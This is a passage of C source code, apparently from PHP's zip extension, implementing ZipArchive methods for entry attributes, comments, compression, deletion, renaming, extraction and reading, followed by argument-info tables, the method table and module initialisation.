if (zip_file_set_external_attributes(intern, (zip_uint64_t)index,
(zip_flags_t)flags, (zip_uint8_t)(opsys&0xff), (zip_uint32_t)attr) < 0) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::getExternalAttributesName(string name, int &opsys, int &attr [, int flags])
Get external attributes for file in zip, using its name */
static ZIPARCHIVE_METHOD(getExternalAttributesName)
{
struct zip *intern;
zval *self = getThis(), *z_opsys, *z_attr;
size_t name_len;
char *name;
zend_long flags=0;
zip_uint8_t opsys;
zip_uint32_t attr;
zip_int64_t idx;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "sz/z/|l",
&name, &name_len, &z_opsys, &z_attr, &flags) == FAILURE) {
return;
}
if (name_len < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string as entry name");
}
idx = zip_name_locate(intern, name, 0);
if (idx < 0) {
RETURN_FALSE;
}
if (zip_file_get_external_attributes(intern, idx,
(zip_flags_t)flags, &opsys, &attr) < 0) {
RETURN_FALSE;
}
zval_ptr_dtor(z_opsys);
ZVAL_LONG(z_opsys, opsys);
zval_ptr_dtor(z_attr);
ZVAL_LONG(z_attr, attr);
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::getExternalAttributesIndex(int index, int &opsys, int &attr [, int flags])
Get external attributes for file in zip, using its index */
static ZIPARCHIVE_METHOD(getExternalAttributesIndex)
{
struct zip *intern;
zval *self = getThis(), *z_opsys, *z_attr;
zend_long index, flags=0;
zip_uint8_t opsys;
zip_uint32_t attr;
struct zip_stat sb;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "lz/z/|l",
&index, &z_opsys, &z_attr, &flags) == FAILURE) {
return;
}
PHP_ZIP_STAT_INDEX(intern, index, 0, sb);
if (zip_file_get_external_attributes(intern, (zip_uint64_t)index,
(zip_flags_t)flags, &opsys, &attr) < 0) {
RETURN_FALSE;
}
zval_dtor(z_opsys);
ZVAL_LONG(z_opsys, opsys);
zval_dtor(z_attr);
ZVAL_LONG(z_attr, attr);
RETURN_TRUE;
}
/* }}} */
#endif /* ifdef ZIP_OPSYS_DEFAULT */
/* {{{ proto string ZipArchive::getCommentName(string name[, int flags])
Returns the comment of an entry using its name */
static ZIPARCHIVE_METHOD(getCommentName)
{
struct zip *intern;
zval *self = getThis();
size_t name_len;
int idx;
zend_long flags = 0;
int comment_len = 0;
const char * comment;
char *name;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "s|l",
&name, &name_len, &flags) == FAILURE) {
return;
}
if (name_len < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string as entry name");
RETURN_FALSE;
}
idx = zip_name_locate(intern, name, 0);
if (idx < 0) {
RETURN_FALSE;
}
comment = zip_get_file_comment(intern, idx, &comment_len, (int)flags);
if (comment == NULL) {
RETURN_FALSE;
}
RETURN_STRINGL((char *)comment, (zend_long)comment_len);
}
/* }}} */
/* {{{ proto string ZipArchive::getCommentIndex(int index[, int flags])
Returns the comment of an entry using its index */
static ZIPARCHIVE_METHOD(getCommentIndex)
{
struct zip *intern;
zval *self = getThis();
zend_long index, flags = 0;
const char * comment;
int comment_len = 0;
struct zip_stat sb;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "l|l",
&index, &flags) == FAILURE) {
return;
}
PHP_ZIP_STAT_INDEX(intern, index, 0, sb);
comment = zip_get_file_comment(intern, index, &comment_len, (int)flags);
if (comment == NULL) {
RETURN_FALSE;
}
RETURN_STRINGL((char *)comment, (zend_long)comment_len);
}
/* }}} */
/* {{{ proto bool ZipArchive::setCompressionName(string name, int comp_method[, int comp_flags])
Set the compression of a file in zip, using its name */
static ZIPARCHIVE_METHOD(setCompressionName)
{
struct zip *intern;
zval *this = getThis();
size_t name_len;
char *name;
zip_int64_t idx;
zend_long comp_method, comp_flags = 0;
if (!this) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, this);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "sl|l",
&name, &name_len, &comp_method, &comp_flags) == FAILURE) {
return;
}
if (name_len < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string as entry name");
}
idx = zip_name_locate(intern, name, 0);
if (idx < 0) {
RETURN_FALSE;
}
if (zip_set_file_compression(intern, (zip_uint64_t)idx,
(zip_int32_t)comp_method, (zip_uint32_t)comp_flags) != 0) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::setCompressionIndex(int index, int comp_method[, int comp_flags])
Set the compression of a file in zip, using its index */
static ZIPARCHIVE_METHOD(setCompressionIndex)
{
struct zip *intern;
zval *this = getThis();
zend_long index;
zend_long comp_method, comp_flags = 0;
if (!this) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, this);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "ll|l",
&index, &comp_method, &comp_flags) == FAILURE) {
return;
}
if (zip_set_file_compression(intern, (zip_uint64_t)index,
(zip_int32_t)comp_method, (zip_uint32_t)comp_flags) != 0) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::deleteIndex(int index)
Delete a file using its index */
static ZIPARCHIVE_METHOD(deleteIndex)
{
struct zip *intern;
zval *self = getThis();
zend_long index;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "l", &index) == FAILURE) {
return;
}
if (index < 0) {
RETURN_FALSE;
}
if (zip_delete(intern, index) < 0) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::deleteName(string name)
Delete a file using its name */
static ZIPARCHIVE_METHOD(deleteName)
{
struct zip *intern;
zval *self = getThis();
size_t name_len;
char *name;
struct zip_stat sb;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "s", &name, &name_len) == FAILURE) {
return;
}
if (name_len < 1) {
RETURN_FALSE;
}
PHP_ZIP_STAT_PATH(intern, name, name_len, 0, sb);
if (zip_delete(intern, sb.index)) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::renameIndex(int index, string new_name)
Rename an entry selected by its index to new_name */
static ZIPARCHIVE_METHOD(renameIndex)
{
struct zip *intern;
zval *self = getThis();
char *new_name;
size_t new_name_len;
zend_long index;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "ls", &index, &new_name, &new_name_len) == FAILURE) {
return;
}
if (index < 0) {
RETURN_FALSE;
}
if (new_name_len < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string as new entry name");
RETURN_FALSE;
}
if (zip_rename(intern, index, (const char *)new_name) != 0) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::renameName(string name, string new_name)
Rename an entry selected by its name to new_name */
static ZIPARCHIVE_METHOD(renameName)
{
struct zip *intern;
zval *self = getThis();
struct zip_stat sb;
char *name, *new_name;
size_t name_len, new_name_len;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "ss", &name, &name_len, &new_name, &new_name_len) == FAILURE) {
return;
}
if (new_name_len < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string as new entry name");
RETURN_FALSE;
}
PHP_ZIP_STAT_PATH(intern, name, name_len, 0, sb);
if (zip_rename(intern, sb.index, (const char *)new_name)) {
RETURN_FALSE;
}
RETURN_TRUE;
}
/* }}} */
/* {{{ proto bool ZipArchive::unchangeIndex(int index)
Changes to the file at position index are reverted */
static ZIPARCHIVE_METHOD(unchangeIndex)
{
struct zip *intern;
zval *self = getThis();
zend_long index;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "l", &index) == FAILURE) {
return;
}
if (index < 0) {
RETURN_FALSE;
}
if (zip_unchange(intern, index) != 0) {
RETURN_FALSE;
} else {
RETURN_TRUE;
}
}
/* }}} */
/* {{{ proto bool ZipArchive::unchangeName(string name)
Changes to the file named 'name' are reverted */
static ZIPARCHIVE_METHOD(unchangeName)
{
struct zip *intern;
zval *self = getThis();
struct zip_stat sb;
char *name;
size_t name_len;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "s", &name, &name_len) == FAILURE) {
return;
}
if (name_len < 1) {
RETURN_FALSE;
}
PHP_ZIP_STAT_PATH(intern, name, name_len, 0, sb);
if (zip_unchange(intern, sb.index) != 0) {
RETURN_FALSE;
} else {
RETURN_TRUE;
}
}
/* }}} */
/* {{{ proto bool ZipArchive::unchangeAll()
All changes to files and global information in archive are reverted */
static ZIPARCHIVE_METHOD(unchangeAll)
{
struct zip *intern;
zval *self = getThis();
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zip_unchange_all(intern) != 0) {
RETURN_FALSE;
} else {
RETURN_TRUE;
}
}
/* }}} */
/* {{{ proto bool ZipArchive::unchangeArchive()
Revert all global changes to the archive. For now, this only reverts archive comment changes. */
static ZIPARCHIVE_METHOD(unchangeArchive)
{
struct zip *intern;
zval *self = getThis();
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zip_unchange_archive(intern) != 0) {
RETURN_FALSE;
} else {
RETURN_TRUE;
}
}
/* }}} */
/* {{{ proto bool ZipArchive::extractTo(string pathto[, mixed files])
Extract one or more file from a zip archive */
/* TODO:
* - allow index or array of indices
* - replace path
* - patterns
*/
static ZIPARCHIVE_METHOD(extractTo)
{
struct zip *intern;
zval *self = getThis();
zval *zval_files = NULL;
zval *zval_file = NULL;
php_stream_statbuf ssb;
char *pathto;
size_t pathto_len;
int ret, i;
int nelems;
if (!self) {
RETURN_FALSE;
}
if (zend_parse_parameters(ZEND_NUM_ARGS(), "s|z", &pathto, &pathto_len, &zval_files) == FAILURE) {
return;
}
if (pathto_len < 1) {
RETURN_FALSE;
}
if (php_stream_stat_path_ex(pathto, PHP_STREAM_URL_STAT_QUIET, &ssb, NULL) < 0) {
ret = php_stream_mkdir(pathto, 0777, PHP_STREAM_MKDIR_RECURSIVE, NULL);
if (!ret) {
RETURN_FALSE;
}
}
ZIP_FROM_OBJECT(intern, self);
if (zval_files && (Z_TYPE_P(zval_files) != IS_NULL)) {
switch (Z_TYPE_P(zval_files)) {
case IS_STRING:
if (!php_zip_extract_file(intern, pathto, Z_STRVAL_P(zval_files), Z_STRLEN_P(zval_files))) {
RETURN_FALSE;
}
break;
case IS_ARRAY:
nelems = zend_hash_num_elements(Z_ARRVAL_P(zval_files));
if (nelems == 0 ) {
RETURN_FALSE;
}
for (i = 0; i < nelems; i++) {
if ((zval_file = zend_hash_index_find(Z_ARRVAL_P(zval_files), i)) != NULL) {
switch (Z_TYPE_P(zval_file)) {
case IS_LONG:
break;
case IS_STRING:
if (!php_zip_extract_file(intern, pathto, Z_STRVAL_P(zval_file), Z_STRLEN_P(zval_file))) {
RETURN_FALSE;
}
break;
}
}
}
break;
case IS_LONG:
default:
php_error_docref(NULL, E_WARNING, "Invalid argument, expect string or array of strings");
break;
}
} else {
/* Extract all files */
int filecount = zip_get_num_files(intern);
if (filecount == -1) {
php_error_docref(NULL, E_WARNING, "Illegal archive");
RETURN_FALSE;
}
for (i = 0; i < filecount; i++) {
char *file = (char*)zip_get_name(intern, i, ZIP_FL_UNCHANGED);
if (!file || !php_zip_extract_file(intern, pathto, file, strlen(file))) {
RETURN_FALSE;
}
}
}
RETURN_TRUE;
}
/* }}} */
static void php_zip_get_from(INTERNAL_FUNCTION_PARAMETERS, int type) /* {{{ */
{
struct zip *intern;
zval *self = getThis();
struct zip_stat sb;
struct zip_file *zf;
zend_long index = -1;
zend_long flags = 0;
zend_long len = 0;
zend_string *filename;
zend_string *buffer;
int n = 0;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (type == 1) {
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|ll", &filename, &len, &flags) == FAILURE) {
return;
}
PHP_ZIP_STAT_PATH(intern, ZSTR_VAL(filename), ZSTR_LEN(filename), flags, sb);
} else {
if (zend_parse_parameters(ZEND_NUM_ARGS(), "l|ll", &index, &len, &flags) == FAILURE) {
return;
}
PHP_ZIP_STAT_INDEX(intern, index, 0, sb);
}
if (sb.size < 1) {
RETURN_EMPTY_STRING();
}
if (len < 1) {
len = sb.size;
}
if (index >= 0) {
zf = zip_fopen_index(intern, index, flags);
} else {
zf = zip_fopen(intern, ZSTR_VAL(filename), flags);
}
if (zf == NULL) {
RETURN_FALSE;
}
buffer = zend_string_safe_alloc(1, len, 0, 0);
n = zip_fread(zf, ZSTR_VAL(buffer), ZSTR_LEN(buffer));
if (n < 1) {
zip_fclose(zf);
zend_string_free(buffer);
RETURN_EMPTY_STRING();
}
zip_fclose(zf);
ZSTR_VAL(buffer)[n] = '\0';
ZSTR_LEN(buffer) = n;
RETURN_NEW_STR(buffer);
}
/* }}} */
/* {{{ proto string ZipArchive::getFromName(string entryname[, int len [, int flags]])
get the contents of an entry using its name */
static ZIPARCHIVE_METHOD(getFromName)
{
php_zip_get_from(INTERNAL_FUNCTION_PARAM_PASSTHRU, 1);
}
/* }}} */
/* {{{ proto string ZipArchive::getFromIndex(int index[, int len [, int flags]])
get the contents of an entry using its index */
static ZIPARCHIVE_METHOD(getFromIndex)
{
php_zip_get_from(INTERNAL_FUNCTION_PARAM_PASSTHRU, 0);
}
/* }}} */
/* {{{ proto resource ZipArchive::getStream(string entryname)
get a stream for an entry using its name */
static ZIPARCHIVE_METHOD(getStream)
{
struct zip *intern;
zval *self = getThis();
struct zip_stat sb;
char *mode = "rb";
zend_string *filename;
php_stream *stream;
ze_zip_object *obj;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P", &filename) == FAILURE) {
return;
}
if (zip_stat(intern, ZSTR_VAL(filename), 0, &sb) != 0) {
RETURN_FALSE;
}
obj = Z_ZIP_P(self);
stream = php_stream_zip_open(obj->filename, ZSTR_VAL(filename), mode STREAMS_CC);
if (stream) {
php_stream_to_zval(stream, return_value);
} else {
RETURN_FALSE;
}
}
/* }}} */
/* {{{ arginfo */
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_open, 0, 0, 1)
ZEND_ARG_INFO(0, filename)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setpassword, 0, 0, 1)
ZEND_ARG_INFO(0, password)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_ziparchive__void, 0)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_addemptydir, 0, 0, 1)
ZEND_ARG_INFO(0, dirname)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_addglob, 0, 0, 1)
ZEND_ARG_INFO(0, pattern)
ZEND_ARG_INFO(0, flags)
ZEND_ARG_INFO(0, options)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_addpattern, 0, 0, 1)
ZEND_ARG_INFO(0, pattern)
ZEND_ARG_INFO(0, path)
ZEND_ARG_INFO(0, options)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_addfile, 0, 0, 1)
ZEND_ARG_INFO(0, filepath)
ZEND_ARG_INFO(0, entryname)
ZEND_ARG_INFO(0, start)
ZEND_ARG_INFO(0, length)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_addfromstring, 0, 0, 2)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(0, content)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_statname, 0, 0, 1)
ZEND_ARG_INFO(0, filename)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_statindex, 0, 0, 1)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setarchivecomment, 0, 0, 1)
ZEND_ARG_INFO(0, comment)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setcommentindex, 0, 0, 2)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(0, comment)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getcommentname, 0, 0, 1)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getcommentindex, 0, 0, 1)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_renameindex, 0, 0, 2)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(0, new_name)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_renamename, 0, 0, 2)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(0, new_name)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_unchangeindex, 0, 0, 1)
ZEND_ARG_INFO(0, index)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_unchangename, 0, 0, 1)
ZEND_ARG_INFO(0, name)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_extractto, 0, 0, 1)
ZEND_ARG_INFO(0, pathto)
ZEND_ARG_INFO(0, files)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getfromname, 0, 0, 1)
ZEND_ARG_INFO(0, entryname)
ZEND_ARG_INFO(0, len)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getfromindex, 0, 0, 1)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(0, len)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getarchivecomment, 0, 0, 0)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setcommentname, 0, 0, 2)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(0, comment)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getstream, 0, 0, 1)
ZEND_ARG_INFO(0, entryname)
ZEND_END_ARG_INFO()
#ifdef ZIP_OPSYS_DEFAULT
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setextattrname, 0, 0, 3)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(0, opsys)
ZEND_ARG_INFO(0, attr)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setextattrindex, 0, 0, 3)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(0, opsys)
ZEND_ARG_INFO(0, attr)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getextattrname, 0, 0, 3)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(1, opsys)
ZEND_ARG_INFO(1, attr)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_getextattrindex, 0, 0, 3)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(1, opsys)
ZEND_ARG_INFO(1, attr)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
#endif /* ifdef ZIP_OPSYS_DEFAULT */
/* }}} */
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setcompname, 0, 0, 2)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(0, method)
ZEND_ARG_INFO(0, compflags)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_ziparchive_setcompindex, 0, 0, 2)
ZEND_ARG_INFO(0, index)
ZEND_ARG_INFO(0, method)
ZEND_ARG_INFO(0, compflags)
ZEND_END_ARG_INFO()
/* {{{ ze_zip_object_class_functions */
static const zend_function_entry zip_class_functions[] = {
ZIPARCHIVE_ME(open, arginfo_ziparchive_open, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setPassword, arginfo_ziparchive_setpassword, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(close, arginfo_ziparchive__void, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getStatusString, arginfo_ziparchive__void, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(addEmptyDir, arginfo_ziparchive_addemptydir, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(addFromString, arginfo_ziparchive_addfromstring, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(addFile, arginfo_ziparchive_addfile, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(addGlob, arginfo_ziparchive_addglob, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(addPattern, arginfo_ziparchive_addpattern, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(renameIndex, arginfo_ziparchive_renameindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(renameName, arginfo_ziparchive_renamename, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setArchiveComment, arginfo_ziparchive_setarchivecomment, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getArchiveComment, arginfo_ziparchive_getarchivecomment, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setCommentIndex, arginfo_ziparchive_setcommentindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setCommentName, arginfo_ziparchive_setcommentname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getCommentIndex, arginfo_ziparchive_getcommentindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getCommentName, arginfo_ziparchive_getcommentname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(deleteIndex, arginfo_ziparchive_unchangeindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(deleteName, arginfo_ziparchive_unchangename, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(statName, arginfo_ziparchive_statname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(statIndex, arginfo_ziparchive_statindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(locateName, arginfo_ziparchive_statname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getNameIndex, arginfo_ziparchive_statindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(unchangeArchive, arginfo_ziparchive__void, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(unchangeAll, arginfo_ziparchive__void, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(unchangeIndex, arginfo_ziparchive_unchangeindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(unchangeName, arginfo_ziparchive_unchangename, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(extractTo, arginfo_ziparchive_extractto, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getFromName, arginfo_ziparchive_getfromname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getFromIndex, arginfo_ziparchive_getfromindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getStream, arginfo_ziparchive_getstream, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setExternalAttributesName, arginfo_ziparchive_setextattrname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setExternalAttributesIndex, arginfo_ziparchive_setextattrindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getExternalAttributesName, arginfo_ziparchive_getextattrname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getExternalAttributesIndex, arginfo_ziparchive_getextattrindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setCompressionName, arginfo_ziparchive_setcompname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setCompressionIndex, arginfo_ziparchive_setcompindex, ZEND_ACC_PUBLIC)
{NULL, NULL, NULL}
};
/* }}} */
static void php_zip_free_prop_handler(zval *el) /* {{{ */ {
pefree(Z_PTR_P(el), 1);
} /* }}} */
/* {{{ PHP_MINIT_FUNCTION */
static PHP_MINIT_FUNCTION(zip)
{
zend_class_entry ce;
memcpy(&zip_object_handlers, zend_get_std_object_handlers(), sizeof(zend_object_handlers));
zip_object_handlers.offset = XtOffsetOf(ze_zip_object, zo);
zip_object_handlers.free_obj = php_zip_object_free_storage;
zip_object_handlers.clone_obj = NULL;
zip_object_handlers.get_property_ptr_ptr = php_zip_get_property_ptr_ptr;
zip_object_handlers.get_properties = php_zip_get_properties;
zip_object_handlers.read_property = php_zip_read_property;
zip_object_handlers.has_property = php_zip_has_property;
INIT_CLASS_ENTRY(ce, "ZipArchive", zip_class_functions);
ce.create_object = php_zip_object_new;
zip_class_entry = zend_register_internal_class(&ce);
zend_hash_init(&zip_prop_handlers, 0, NULL, php_zip_free_prop_handler, 1);
php_zip_register_prop_handler(&zip_prop_handlers, "status", php_zip_status, NULL, NULL, IS_LONG);
php_zip_register_prop_handler(&zip_prop_handlers, "statusSys", php_zip_status_sys, NULL, NULL, IS_LONG);
php_zip_register_prop_handler(&zip_prop_handlers, "numFiles", php_zip_get_num_files, NULL, NULL, IS_LONG);
php_zip_register_prop_handler(&zip_prop_handlers, "filename", NULL, NULL, php_zipobj_get_filename, IS_STRING);
php_zip_register_prop_handler(&zip_prop_handlers, "comment", NULL, php_zipobj_get_zip_comment, NULL, IS_STRING);
REGISTER_ZIP_CLASS_CONST_LONG("CREATE", ZIP_CREATE);
REGISTER_ZIP_CLASS_CONST_LONG("EXCL", ZIP_EXCL);
REGISTER_ZIP_CLASS_CONST_LONG("CHECKCONS", ZIP_CHECKCONS);
REGISTER_ZIP_CLASS_CONST_LONG("OVERWRITE", ZIP_OVERWRITE);
REGISTER_ZIP_CLASS_CONST_LONG("FL_NOCASE", ZIP_FL_NOCASE);
REGISTER_ZIP_CLASS_CONST_LONG("FL_NODIR", ZIP_FL_NODIR);
REGISTER_ZIP_CLASS_CONST_LONG("FL_COMPRESSED", ZIP_FL_COMPRESSED);
REGISTER_ZIP_CLASS_CONST_LONG("FL_UNCHANGED", ZIP_FL_UNCHANGED);
REGISTER_ZIP_CLASS_CONST_LONG("CM_DEFAULT", ZIP_CM_DEFAULT);
REGISTER_ZIP_CLASS_CONST_LONG("CM_STORE", ZIP_CM_STORE);
REGISTER_ZIP_CLASS_CONST_LONG("CM_SHRINK", ZIP_CM_SHRINK);
REGISTER_ZIP_CLASS_CONST_LONG("CM_REDUCE_1", ZIP_CM_REDUCE_1);
REGISTER_ZIP_CLASS_CONST_LONG("CM_REDUCE_2", ZIP_CM_REDUCE_2);
REGISTER_ZIP_CLASS_CONST_LONG("CM_REDUCE_3", ZIP_CM_REDUCE_3);
REGISTER_ZIP_CLASS_CONST_LONG("CM_REDUCE_4", ZIP_CM_REDUCE_4);
REGISTER_ZIP_CLASS_CONST_LONG("CM_IMPLODE", ZIP_CM_IMPLODE);
REGISTER_ZIP_CLASS_CONST_LONG("CM_DEFLATE", ZIP_CM_DEFLATE);
REGISTER_ZIP_CLASS_CONST_LONG("CM_DEFLATE64", ZIP_CM_DEFLATE64);
REGISTER_ZIP_CLASS_CONST_LONG("CM_PKWARE_IMPLODE", ZIP_CM_PKWARE_IMPLODE);
REGISTER_ZIP_CLASS_CONST_LONG("CM_BZIP2", ZIP_CM_BZIP2);
REGISTER_ZIP_CLASS_CONST_LONG("CM_LZMA", ZIP_CM_LZMA);
REGISTER_ZIP_CLASS_CONST_LONG("CM_TERSE", ZIP_CM_TERSE);
REGISTER_ZIP_CLASS_CONST_LONG("CM_LZ77", ZIP_CM_LZ77);
REGISTER_ZIP_CLASS_CONST_LONG("CM_WAVPACK", ZIP_CM_WAVPACK);
REGISTER_ZIP_CLASS_CONST_LONG("CM_PPMD", ZIP_CM_PPMD);
/* Error code */
REGISTER_ZIP_CLASS_CONST_LONG("ER_OK", ZIP_ER_OK); /* N No error */
REGISTER_ZIP_CLASS_CONST_LONG("ER_MULTIDISK", ZIP_ER_MULTIDISK); /* N Multi-disk zip archives not supported */
REGISTER_ZIP_CLASS_CONST_LONG("ER_RENAME", ZIP_ER_RENAME); /* S Renaming temporary file failed */
REGISTER_ZIP_CLASS_CONST_LONG("ER_CLOSE", ZIP_ER_CLOSE); /* S Closing zip archive failed */
